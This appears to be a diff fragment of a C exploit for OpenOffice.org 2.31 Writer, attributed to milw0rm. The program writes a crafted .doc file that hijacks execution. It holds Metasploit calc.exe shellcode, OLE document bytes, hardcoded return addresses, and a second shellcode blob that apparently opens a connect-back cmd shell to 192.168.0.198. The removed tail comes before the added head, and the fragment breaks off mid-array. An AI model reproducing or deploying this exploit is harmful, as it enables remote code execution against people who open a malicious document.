-"\x01\x00\x00\x00\xfe\xff\xff\xff\x03\x00\x00\x00\x04\x00\x00\x00"
-"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
-"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x01\x41\x41\x41\x41\xfe\x45\x93\x60\x43\x43\x43\x43\xa8\xef\xff"
-"\xff\xbd\x5c\x91\x60\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
-"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
-"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
-"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
-"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
-"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
-"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
-"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
-"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
-"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
-"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
-"\xc0\xa8\x00\xc6\x66\x68\x7a\x51\x66\x53\x89\xe1\x95\x68\xec\xf9"
-"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
-"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
-"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
-"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
-"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
-"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
-"\xff\x77\xfc\xff\xd0\x68\x7e\xd8\xe2\x73\x53\xff\xd6\xff\xd0\x44"
-"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
-"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
-"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
-"\x00\x00\x00\x14\x00\x00\x00\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74"
-"\x20\x57\x6f\x72\x64\x20\x31\x30\x2e\x30\x00\x40\x00\x00\x00\x00"
-"\x8c\x86\x47\x00\x00\x00\x00\x40\x00\x00\x00\x00\x46\x4c\x26\x97"
-"\xea\xc3\x01\x40\x00\x00\x00\x00\xea\xff\x56\x9f\x1b\xc6\x01\x40"
-"\x00\x00\x00\x00\xbe\xae\xfd\x65\x1c\xc6\x01\x03\x00\x00\x00\x00"
-;
-
-
-
-int main(int argc, char *argv[]) {
-	FILE* file;
-	char evilbuff[200000];
-	int offset=0;
-
-     printf("[+] Open Office.org 2.31 swriter code execution\n");
-     printf("[+] Marsupilamipowa@hotmail.fr\n");
-	if (argc!=2) {
-		printf("[+] Usage: %s file.doc \n",argv[0]);
-		return 0;
-	}
-
-	memcpy(evilbuff+offset,file_part0,sizeof(file_part0)-1);
-	offset+=sizeof(file_part0)-1;
-	memcpy(evilbuff+offset,file_part1,sizeof(file_part1)-1);
-	offset+=sizeof(file_part1)-1;
-	memcpy(evilbuff+offset,file_part2,sizeof(file_part2)-1);
-	offset+=sizeof(file_part2)-1;
-	memcpy(evilbuff+offset,file_part3,sizeof(file_part3)-1);
-	offset+=sizeof(file_part3)-1;
-	memcpy(evilbuff+offset,file_part4,sizeof(file_part4)-1);
-	offset+=sizeof(file_part4)-1;
-	memcpy(evilbuff+offset,file_part5,sizeof(file_part5)-1);
-	offset+=sizeof(file_part5)-1;
-	memcpy(evilbuff+offset,file_part6,sizeof(file_part6)-1);
-	offset+=sizeof(file_part6)-1;
-	memcpy(evilbuff+offset,file_part7,sizeof(file_part7)-1);
-	offset+=sizeof(file_part7)-1;
-	memcpy(evilbuff+offset,file_part8,sizeof(file_part8)-1);
-	offset+=sizeof(file_part8)-1;
-	memcpy(evilbuff+offset,file_part9,sizeof(file_part9)-1);
-	offset+=sizeof(file_part9)-1;
-
-	/*
-     	At the moment eip gets owned, ebx is controllable. Shellcode is at esp+0xFFFFEFA8.
-	     So first, ADD ESP, EBX then RET and finally PUSH ESP - RET.
-	*/
-	
-	memcpy(evilbuff+0x1c415,"\xFE\x45\x93\x60",4); //ADD ESP, EBX ... RET in tl680mi
-	memcpy(evilbuff+0x1c411,"\xBD\x5C\x91\x60",4); //PUSH ESP - RET in tl680mi
-	memcpy(evilbuff+0x1c40D,"\xA8\xEF\xFF\xFF",4); //value for EBX
-	memcpy(evilbuff+0x1c460,calc,sizeof(calc)-1);
-	
-	if ((file=fopen(argv[1],"wb"))==0) {
-		printf("[-] Unable to access file.\n");
-		return 0;
-	}
-
-	fwrite( evilbuff, 1, offset, file );
-	fclose(file);
-	printf("[+] Done. Have fun!\n");
-	return 0;
-}
-
-// milw0rm.com [2008-05-10]
+/* 
+     Open Office.org 2.31 swriter local code execution exploit.
+     This bug has been patched in OOo 2.4.
+     Spawns calc.exe if successful.
+     
+     Marsupilamipowa@hotmail.fr
+*/
+
+#include 
+#include 
+#include 
+
+/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
+unsigned char calc[] =
+"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xcc"
+"\x35\x6a\xc8\x83\xeb\xfc\xe2\xf4\x30\xdd\x2e\xc8\xcc\x35\xe1\x8d"
+"\xf0\xbe\x16\xcd\xb4\x34\x85\x43\x83\x2d\xe1\x97\xec\x34\x81\x81"
+"\x47\x01\xe1\xc9\x22\x04\xaa\x51\x60\xb1\xaa\xbc\xcb\xf4\xa0\xc5"
+"\xcd\xf7\x81\x3c\xf7\x61\x4e\xcc\xb9\xd0\xe1\x97\xe8\x34\x81\xae"
+"\x47\x39\x21\x43\x93\x29\x6b\x23\x47\x29\xe1\xc9\x27\xbc\x36\xec"
+"\xc8\xf6\x5b\x08\xa8\xbe\x2a\xf8\x49\xf5\x12\xc4\x47\x75\x66\x43"
+"\xbc\x29\xc7\x43\xa4\x3d\x81\xc1\x47\xb5\xda\xc8\xcc\x35\xe1\xa0"
+"\xf0\x6a\x5b\x3e\xac\x63\xe3\x30\x4f\xf5\x11\x98\xa4\x4b\xb2\x2a"
+"\xbf\x5d\xf2\x36\x46\x3b\x3d\x37\x2b\x56\x0b\xa4\xaf\x1b\x0f\xb0"
+"\xa9\x35\x6a\xc8";
+
+char file_part0[]=
+"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
+"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
+"\xcc\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xce\x00\x00\x00"
+"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\xdc\x00\x00\x00"
+"\xcd\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\x32\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xec\xa5\xc1\x00\x35\x40\x09\x04\x00\x00\xf0\x12\xbf\x00\x00\x00"
+"\x00\x00\x00\x30\x00\x00\x00\x00\x00\x06\x00\x00\x1a\x7c\x00\x00"
+"\x0e\x00\x62\x6a\x62\x6a\xcf\x32\xcf\x32\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x04\x16\x00"
+"\x29\x02\x01\x00\xad\x58\x00\x00\xad\x58\x00\x00\xdf\x73\x00\x00"
+"\x00\x00\x00\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0f\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x0f\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\xff\xff\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x42\x00\x08\x03"
+"\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x14\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00"
+"\x00\x00\x04\x56\x00\x00\x00\x00\x00\x00\x04\x56\x00\x00\x00\x00"
+"\x00\x00\x04\x56\x00\x00\x38\x00\x00\x00\x3c\x56\x00\x00\x34\x00"
+"\x00\x00\x70\x56\x00\x00\xdc\x01\x00\x00\x1c\x03\x00\x00\x00\x00"
+"\x00\x00\xcb\x6b\x00\x00\xf2\x00\x00\x00\x58\x58\x00\x00\x00\x00"
+"\x00\x00\x58\x58\x00\x00\x16\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x02\x00"
+"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x00\x00"
+"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x00\x00"
+"\x00\x00\x4c\x6b\x00\x00\x00\x00\x00\x00\x4c\x6b\x00\x00\x24\x00"
+"\x00\x00\xbd\x6c\x00\x00\x52\x02\x00\x00\x0f\x6f\x00\x00\x6e\x00"
+"\x00\x00\x70\x6b\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x00\x5e\x00\x00\x00\x00"
+"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x70\x6b\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
+"\x00\x00\x85\x6b\x00\x00\x16\x00\x00\x00\x82\x61\x00\x00\x00\x00"
+"\x00\x00\x82\x61\x00\x00\x00\x00\x00\x00\x82\x61\x00\x00\x00\x00"
+"\x00\x00\x00\x5e\x00\x00\xea\x01\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x61\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x5e\x00\x00\x00\x00\x00\x00\x4a\x6b\x00\x00\x00\x00"
+"\x00\x00\x82\x61\x00\x00\xf8\x00\x56\x00\x82\x61\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00"
+"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x4c\x58\x00\x00\x0c\x00"
+"\x00\x00\xf0\xaa\x92\x0f\x66\x1c\xc6\x01\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x04\x56\x00\x00\x00\x00\x00\x00\xea\x5f\x00\x00\x76\x00"
+"\x00\x00\x7a\x62\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\xce\x62\x00\x00\x7c\x08\x00\x00\x9b\x6b\x00\x00\x30\x00"
+"\x00\x00\xcb\x6b\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00"
+"\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00\x60\x60\x00\x00\x00\x01"
+"\x00\x00\x7d\x6f\x00\x00\x00\x00\x00\x00\x7a\x62\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00"
+"\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x08\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x7a\x62\x00\x00\x14\x00\x00\x00\x7d\x6f\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x03\x00\x00\x00\x00"
+"\x00\x00\x8e\x62\x00\x00\x40\x00\x00\x00\x6e\x58\x00\x00\xf0\x01"
+"\x00\x00\x5e\x5a\x00\x00\x62\x01\x00\x00\x82\x61\x00\x00\x00\x00"
+"\x00\x00\xc0\x5b\x00\x00\x1c\x01\x00\x00\xdc\x5c\x00\x00\x24\x01"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x6e\x58\x00\x00\x00\x00"
+"\x00\x00\x6e\x58\x00\x00\x00\x00\x00\x00\x70\x6b\x00\x00\x00\x00"
+"\x00\x00\x70\x6b\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00"
+"\x00\x00\x1c\x03\x00\x00\x84\x51\x00\x00\xa0\x54\x00\x00\x64\x01"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x61\x00\x00\x22\x00"
+"\x00\x00\x1c\x03\x00\x00\x00\x00\x00\x00\x1c\x03\x00\x00\x00\x00"
+"\x00\x00\xa0\x54\x00\x00\x00\x00\x00\x00\x02\x00\x01\x01\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x4c\x45\x20\x4c\x49\x56\x52\x45\x54\x20\x44\x55\x20\x50\x52\x4f"
+"\x50\x52\x49\x45\x54\x41\x49\x52\x45\x20\x44\x45\x20\x4c\x45\x56"
+"\x52\x49\x45\x52\x20\x53\x50\x4f\x52\x54\x49\x46\x0d\x28\x43\x65"
+"\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x20\x6e\x27\x65\x73\x74\x20"
+"\x70\x61\x73\x20\x75\x6e\x20\x72\xe8\x67\x6c\x65\x6d\x65\x6e\x74"
+"\x20\x6d\x61\x69\x73\x20\x75\x6e\x20\x72\x65\x63\x75\x65\x69\x6c"
+"\x20\x64\x65\x20\x63\x6f\x6e\x73\x65\x69\x6c\x73\x29\x0d\x4f\xf9"
+"\x20\x76\x6f\x75\x73\x20\x61\x64\x72\x65\x73\x73\x65\x72\x20\x3f"
+"\x0d\x49\x6c\x20\x66\x61\x75\x74\x20\x64\x27\x61\x62\x6f\x72\x64"
+"\x20\xe9\x64\x75\x71\x75\x65\x72\x20\x76\x6f\x74\x72\x65\x20\x6a"
+"\x65\x75\x6e\x65\x20\x4c\xe9\x76\x72\x69\x65\x72\x20\xe0\x20\x73"
+"\x75\x69\x76\x72\x65\x20\x6c\x65\x20\x6c\x65\x75\x72\x72\x65\x20"
+"\x6a\x75\x73\x71\x75\x27\x61\x75\x20\x62\x6f\x75\x74\x20\x65\x74"
+"\x20\xe0\x20\x74\x6f\x6c\xe9\x72\x65\x72\x20\x64\x65\x73\x20\x63"
+"\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x73\x2e\x20\x50\x6f\x75\x72"
+"\x20\x63\x65\x6c\x61\x20\x76\x6f\x75\x73\x20\x64\x69\x73\x70\x6f"
+"\x73\x65\x7a\x20\x64\x27\x75\x6e\x20\x72\xe9\x73\x65\x61\x75\x20"
+"\x64\x65\x20\x43\x6c\x75\x62\x73\x20\x64\x65\x20\x54\x72\x61\x76"
+"\x61\x69\x6c\x20\x28\x63\x6c\x75\x62\x73\x20\x64\x65\x20\x63\x6f"
+"\x75\x72\x73\x65\x20\x73\x75\x72\x20\x63\x79\x6e\x6f\x64\x72\x6f"
